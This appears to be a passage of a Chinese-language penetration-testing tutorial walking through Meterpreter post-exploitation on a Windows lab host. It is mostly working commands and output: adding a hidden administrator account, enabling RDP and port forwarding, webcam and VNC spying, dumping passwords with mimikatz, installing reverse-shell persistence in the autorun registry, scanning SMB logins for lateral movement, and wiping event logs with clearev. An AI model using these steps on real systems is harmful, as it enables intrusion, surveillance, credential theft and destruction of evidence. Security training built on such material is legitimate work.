[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*] 	Adding User: xman666 with Password: admin
[-] Account could not be created
[-] Error:
[-] 	命令成功完成。
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.2058.rc
meterpreter > shell
Process 4020 created.
Channel 54 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>net user xman666
net user xman666
用户名                 xman666
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:20:58
密码到期               2019/11/24 11:20:58
密码可更改             2019/10/13 11:20:58
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               从不

可允许的登录小时数     All

本地组成员             *Users                
全局组成员             *None                 
命令成功完成。


C:\Windows\system32>

可以看到,这里用户创建成功了,但添加到Administrators组失败了。

  • 命令行
meterpreter > shell
Process 2816 created.
Channel 52 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    XinSai                   
xman666                  
命令运行完毕,但发生一个或多个错误。

C:\Windows\system32>net user test test /add
net user test test /add
命令成功完成。


C:\Windows\system32>net user
net user

\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    test                     
XinSai                   xman666                  
命令运行完毕,但发生一个或多个错误。


可以看到添加了一个用户test,密码为test。查看用户信息:

C:\Windows\system32>net user test
net user test
用户名                 test
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:11:32
密码到期               2019/11/24 11:11:32
密码可更改             2019/10/13 11:11:32
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               2019/10/13 11:12:03

可允许的登录小时数     All

本地组成员             *Users                
全局组成员             *None                 
命令成功完成。


C:\Windows\system32>

可以看到用户属于Users组,非管理员用户,下面添加到管理员组。

C:\Windows\system32>net localgroup administrators test /add

net localgroup administrators test /add
命令成功完成。


C:\Windows\system32>net user test
net user test
用户名                 test
全名                   
注释                   
用户的注释             
国家/地区代码          000 (系统默认值)
帐户启用               Yes
帐户到期               从不

上次设置密码           2019/10/13 11:11:32
密码到期               2019/11/24 11:11:32
密码可更改             2019/10/13 11:11:32
需要密码               Yes
用户可以更改密码       Yes

允许的工作站           All
登录脚本               
用户配置文件           
主目录                 
上次登录               2019/10/13 11:12:03

可允许的登录小时数     All

本地组成员             *Administrators       *Users                
全局组成员             *None                 
命令成功完成。


C:\Windows\system32>

可以看到,现在用户test已经同时属于Administrators和Users组了。

##使用用户远程登录

  1. 开启远程桌面rdp
meterpreter > run post/windows/manage/enable_rdp 

[*] Enabling Remote Desktop
[*] 	RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] 	The Terminal Services service is not set to auto, changing it to auto ...
[*] 	Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20191012054909_default_192.168.8.129_host.windows.cle_038774.txt
meterpreter > 

也可以使用如下命令,达到同样的效果:

meterpreter > run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] 	RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] 	Terminal Services service is already set to auto
[*] 	Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191012.5056.rc
meterpreter > 

  1. 登录前检查

远程桌面连接前,先检查下受害用户的空闲时长,因为远程登录会把当前用户踢掉,在登录过程中也会显式提醒:

meterpreter > idletime
User has been idle for: 3 hours 48 mins 26 secs
meterpreter > 

  1. 使用rdesktop连接目标桌面
root@kali:~# rdesktop 192.168.1.8
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16


此时弹出GUI界面,输入用户名/密码进行登录 。

账户隐藏

上面新添加的用户可以在目标机器登录界面上看到,因此需要隐藏。

略。

端口转发

下面将远程机器192.168.1.8的3389端口反弹到本地9833端口,然后连接本地9833端口,同样达到远程桌面的效果。

meterpreter > portfwd add -l 9833 -r 192.168.1.8 -p 3389
[*] Local TCP relay created: :9833 <-> 192.168.1.8:3389
meterpreter > 

端口转发成功,现在使用rdesktop进行本地连接:

root@kali:~# rdesktop 127.0.0.1:9833
Autoselected keyboard map en-us
Failed to negotiate protocol, retrying with plain RDP.
WARNING: Remote desktop does not support colour depth 24; falling back to 16
root@kali:~# 

弹出GUI界面,使用用户名/密码登录成功。

屏幕截图

meterpreter > screenshot
Screenshot saved to: /root/aAKvRlgG.jpeg
meterpreter > 

##操作摄像头

  • 获取摄像头列表

    webcam-list
    
  • 从指定的摄像头拍摄照片

    webcam_snap
    
  • 从指定的摄像头实时视频流

    webcam_stream
    

VNC控制

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\QwdqufeOMpX.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
meterpreter > /usr/bin/vncviewer: VNC server closed connection


不知道为什么失败了,经过测试,发现当受害者机器在锁屏界面或者普通用户登录进去的界面时会报这个错。

当管理员用户登录进去时,再运行命令,可以成功,如下:

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.6 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Windows\TEMP\plKeHIXhzUQQ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.6:4545...
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
meterpreter > No authentication needed
Authentication successful
Desktop name "pc"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding


成功弹出VNC图形界面,看到受害者桌面。

##文件操作

可以在meterpreter中使用cd、ls、cat、rm、mkdir等常规命令。

  • 上传文件
meterpreter > upload /root/flag.txt
[*] uploading  : /root/flag.txt -> flag.txt
[*] Uploaded 9.00 B of 9.00 B (100.0%): /root/flag.txt -> flag.txt
[*] uploaded   : /root/flag.txt -> flag.txt
meterpreter > 

使用pwd可以查看当前目录,即文件被传到哪里了。

  • 运行文件
meterpreter > execute -i -f cmd.exe
Process 1020 created.
Channel 40 created.
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

C:\>

比如上传mimikatz程序,然后执行execute -i -f mimikatz.exe ,进入mimikatz的交互界面。

然后执行下列命令获取密码:

privilege::debug sekurlsa::logonpasswords

execute命令详解:

-f 指定可执行文件

-i 跟进程进行交互

-H 创建一个隐藏进程

-a 传递给命令的参数

-m 从内存中执行

-s 在给定会话中执行进程

-t 使用当前伪造的线程令牌运行进行

  • 下载文件
meterpreter > download "c:\Windows\System32\drivers\etc\hosts"
[*] Downloading: c:\Windows\System32\drivers\etc\hosts -> hosts
[*] Downloaded 824.00 B of 824.00 B (100.0%): c:\Windows\System32\drivers\etc\hosts -> hosts
[*] download   : c:\Windows\System32\drivers\etc\hosts -> hosts
meterpreter > 

##持久化

  • 启动项

    用msfvenom命令生成一个反弹shell后面,然后放到目标机器下列路径达到开机自启动的效果:

    C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
    

    我们只要监听相应的端口就行了。

  • 系统服务

meterpreter > run persistence -X -i 5 -p 8888 -r 192.168.1.6

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/PC_20191013.2138/PC_20191013.2138.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=8888
[*] Persistent agent script is 99669 bytes long
[+] Persistent Script written to C:\Windows\TEMP\OueYyJlRdu.vbs
[*] Executing script C:\Windows\TEMP\OueYyJlRdu.vbs
[+] Agent executed with PID 3776
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\UIfUmCsT
meterpreter > 

persisrence参数说明:

-X 开机启动,-i 反向连接间隔, -r 连接的主机,-p 连接的端口

每隔5秒反弹到192.168.1.6到8888端口,如下:

root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.8] 49195

目标机器重启后仍然有效。

实际场景中,还是使用metasploit类的工具等待反弹:

msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.1.6:8888 
[*] Sending stage (179779 bytes) to 192.168.1.8
[*] Meterpreter session 2 opened (192.168.1.6:8888 -> 192.168.1.8:49267) at 2019-10-13 01:05:56 -0400

meterpreter > getuid
Server username: PC\xman666
meterpreter > 

持久化需要考虑杀软等,这里会报警

横向移动

获取子网信息

meterpreter > run get_local_subnets

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
meterpreter > 

使用metasploit模块查看一下该局域网开启3389的服务器。

use  auxiliary/scanner/rdp/rdp_scanner 
set  rhosts 10.0.15.10-33
run

扫描smb登录

use     auxiliary/scanner/smb/smb_login
set     RHOSTS    10.0.15.10-33
set     SMBUser   administrator
set     SMBPass   123456a?
run

remotewinenum

有时候,不能直接远程桌面登录另外一台Window机器,这个时候可以使用Enter-PSSession命令,通过PowerShell终端登到远程的Window机器,这个时候,就需要被访问的机器打开5985 或者5986 端口。 默认情况下,Window 2008 Server或者Window 2012 Server会自动默认开启WinRM的服务器,从而暴露5985或者5986端口。

Enter-PSSession -computerName Server-R2

清除痕迹

meterpreter > clearev
[*] Wiping 8202 records from Application...
[*] Wiping 23907 records from System...
[*] Wiping 8154 records from Security...
meterpreter >